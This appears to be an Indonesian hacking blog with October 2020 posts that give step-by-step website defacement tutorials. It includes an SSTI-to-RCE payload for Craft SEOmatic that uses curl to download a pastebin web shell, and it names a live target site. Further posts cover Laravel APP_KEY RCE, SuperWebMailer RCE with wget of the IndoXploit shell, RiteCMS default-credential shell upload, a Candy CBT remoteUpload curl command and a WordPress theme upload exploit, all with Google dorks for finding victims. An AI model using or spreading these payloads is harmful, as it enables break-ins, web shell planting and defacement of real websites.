Welcome To Security Darknet

Selamat Datang Di Official Security Darknet

Jumat, 30 Oktober 2020

Ngebot Stater Pack

kali ini gua akan membagikan sebuah tools pack / installer yang didalamnya ada banyak tools/bot. gw tau kalian kgak punya skill jadinya harus ngebot.

Isi didalam toolsnya, kurang lebih ada 20 tools, kalian cek aja sendiri. download disini http://www.mediafire.com/

Password : security-darknet.or.id

Jangan lupa share artikel nya juga ajg.

Contact : ncdream72@gmail.com
©security-darknet.or.id

Selasa, 27 Oktober 2020

(Server-Side Template Injection) + (RCE)

 


Deface Poc SSTI to RCE


(Server-Side Template Injection) +  (Remote Code Execution)


Exploit : /actions/seomatic/meta-container/all-meta-containers?uri=


RCE Code = 


{{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}


Itu link pastebin nya bisa lu ganti ke punya lu


Nama file = x.php

Password = aryaganteng

dork : site:*/humans.txt intext:SEOmatic

Paham ga kontol

https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri=


Kasih kode rce nya di belakang uri=

Seperti ini.

https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}


Akses Shell
Site.com/namashell.php

Live Target :

https://www.shopmoment.com/actions/seomatic/meta-container/all-meta-containers?uri=

Lebih jelas lagi.

https://youtu.be/nGjv-P_hhHg

Contact : ncdream72@gmail.com

Laravel RCE APP_KEY

 Laravel RCE via Web Apps


2.Masukkan target (perhatikan penggunaan www,http,dan https)
3.Masukkan APP_KEY yang kalian dapat
4.Masukkan command (kalo saya seringkali dengan ls)
5.Klik exploit
Jika kalian ini melakukan backconnect kalian bisa menggunakan command disini

*note:
Tidak semua APP_KEY pada laravel yang rentan terhadap ini, bisa saja hanya karna perbedaan versi Laravel... 

Laravel RCE via terminal ( CLI )
download tools
php rce.php url=http://target.com/ method=1


Source : nakanosec
Contact : ncdream72@gmail.com

Unauthentication RCE SuperWebMailer

Unauthentication RCE SuperWebMailer


Dork :
inurl:/swm/defaultnewsletter.php

Tools :
https://github.com/Aryaalfahrezi010/RCE_SuperWebMailer

Shell:
https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php Pass IndoXploit


Oke pertama kita dorking dulu seperti biasa

Pilih web yg lo mau terserah
Nah Habis Itu lu hapus bagian defaultnewsletter.php

jadi (https://sitelu.com/swm)


habis itu lu install tools nya gblk

pakek python3 ya itu jangan lupa

python3 exploit.py -u https://sitelu/swm/
Nanti kalo vuln ada tulisannya kyak dibwh ini


Habis itu command rce nya

wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php

Btw itu gua pakek mini shell karna shell tdi ga supp ama web w

Tinggal Akses dah
https://sitelo.com/swm/shell-v3.php

Contact : ncdream72@gmail.com

RiteCMS 2.2.1 - Authenticated Remote Code Execution



RiteCMS 2.2.1 - Authenticated Remote Code Execution

Vendor Homepage: http://ritecms.com/

Version: 2.2.1


Dork:

intext:"Powered By RiteCMS"


1- Go to following url. >> http://(HOST)/cms/

2- Default username and password is admin:admin. We must know login credentials.

3- Go "Filemanager" and press "Upload file" button.

4- Choose your php webshell script and upload it.

shell access?http://target.com/media/yourshell.php


Ref? Rite Cms


Contact : ncdream72@gmail.com

Deface PoC Computer Based Test RCE

 


Deface Poc Computer Based Test RCE


Dork:
"Support By Candy CBT"
"Support By Candy CBT"+"Login"
"Candy CBT"+"Login"
(Kembangin lagi gann...)

# Exploit #
-admin/ifm.php

jika saat di masukan Exploit nya malah redirect ke halaman admin/login.php

Maka itu tandanya vuln.

# Kode Rce #
curl http://targetkalian.com/admin/ifm.php -d 'api=remoteUpload&dir=&filename=D.php&method=curl&url=https://pastebin.com/raw/Vsaj9aS3'
Nama shell nya D.php bsa lu ganti sesuka hati lo

Akses Shell?
http://linktarget.com/files/namashell.php

contact : ncdream72@gmail.com

Deface WordPress Orange Themes

 


Deface WordPress Orange Themes


Dork : 

- inurl:/wp-content/themes/kernel-theme

- inurl:/wp-content/themes/bordeaux-theme

- inurl:/wp-content/themes/bulteno-theme

- inurl:/wp-content/themes/rayoflight-theme


Exploit :

/functions/upload-handler.php


Crsf Online :

https://blogpongo.com/csrf.php


Kalian Dorking Dulu di google

Pilih Salah Satu Web/Target Tambahin Exploitnya

Vuln?= Ada bacaan Error


Lalu Kalian Bukan Csrfnya

Masukkan Url

Contoh :

https://sitetarget.com/wp-content/themes/kernel-theme/functions/upload-handler.php

Post File : orange_themes


Kemudian Klik Submit Nah Terus Upload Shell/Sc Lu Kalo Sukses Nanti Keluar Nama File Kalian


Location File?:/wp-content/uploads/[tahun]/[bulan]/file lu

contoh :

https://sitetarget.com/wp-content/uploads/2020/02/sht.html


contact : ncdream72@gmail.com